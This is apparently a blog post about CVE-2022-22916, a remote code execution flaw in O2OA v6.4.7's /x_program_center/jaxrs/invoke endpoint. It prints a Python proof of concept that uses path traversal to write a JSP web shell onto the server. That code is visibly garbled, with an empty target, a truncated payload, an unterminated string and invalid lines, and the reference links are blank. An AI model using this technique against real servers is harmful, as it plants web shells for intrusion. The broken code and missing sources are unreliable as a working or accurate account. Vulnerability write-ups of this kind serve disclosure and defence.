CVE-2022-22916: Uncovering a Remote Code Execution Vulnerability in O2OA v6.4.7

A new vulnerability, CVE-2022-22916, has been identified in O2OA v6.4.7, software that enables organizations to build collaborative working environments. This remote code execution (RCE) vulnerability allows an attacker to execute arbitrary code on an affected system and potentially access sensitive information without user interaction or knowledge. In this post, we will explain the vulnerability and offer a closer look at code snippets, exploit details, and original references for further knowledge.


O2OA, an open-source office automation system, facilitates the creation of intelligent office environments by integrating tools for work such as document management, task dispatch, and approval processes. It's essential for any software used in creating secure working environments to be well-maintained and updated to address any possible security threats.

Vulnerability Details

The RCE vulnerability in O2OA v6.4.7 can be exploited through the path /x_program_center/jaxrs/invoke, enabling an attacker to execute arbitrary code remotely on an affected system. The vulnerability specifically exists within the processing of input supplied to this endpoint, which may not be properly sanitized or checked, in turn leaving room for a potential exploit.

Exploit Details

In order to exploit the vulnerability via approach mentioned above, an attacker can send a malicious payload to the /x_program_center/jaxrs/invoke endpoint. Here's a code snippet illustrating the attack:

import requests

# Customize the following variables
target_url = "";
payload = """{
  "__path": "fileServer",
  "path": "/../../../../local_folder",
  "fileName": "test.jsp",
  "text": "<%@ page language=\\\"java\\\" contentType=\\\"text/html; charset=UTF-8\\\" pageEncoding=\\\"UTF-8\\\"%>\\n\\n<%!\\n    public String cmd(String c)throws Exception{\\n        ...;"

response =, data=payload)
if response.status_code == 200:
    print("Exploit successful!")
    print("Exploit failed.")

This example Python code sends a POST request carrying the malicious payload to the endpoint. If the exploit is successful, the victim server would execute the code contained within the payload to create and execute a .jsp file.

Please note that the above code snippet is for informational purposes only and should not be used to exploit vulnerabilities on systems without authorized permission.


It is essential for users and administrators to apply patches and updates as they're released to remediate any known vulnerabilities in O2OA or any other software being used. Regularly monitoring and reviewing logs can also assist in identifying possible intrusions or unauthorized access attempts to the system.

For more information on CVE-2022-22916, please refer to the following sources

1. Official CVE description:
2. National Vulnerability Database (NVD): NIST Link:


The remote code execution vulnerability (CVE-2022-22916) present in O2OA v6.4.7 is a critical security issue that should be addressed as soon as possible. By understanding the exploit details and applying necessary updates, businesses can safeguard their collaborative environments against such threats. Regular software updates and proactive system monitoring should be a part of any organization's cybersecurity strategy.


Published on: 02/17/2022 22:15:00 UTC
Last modified on: 02/25/2022 17:50:00 UTC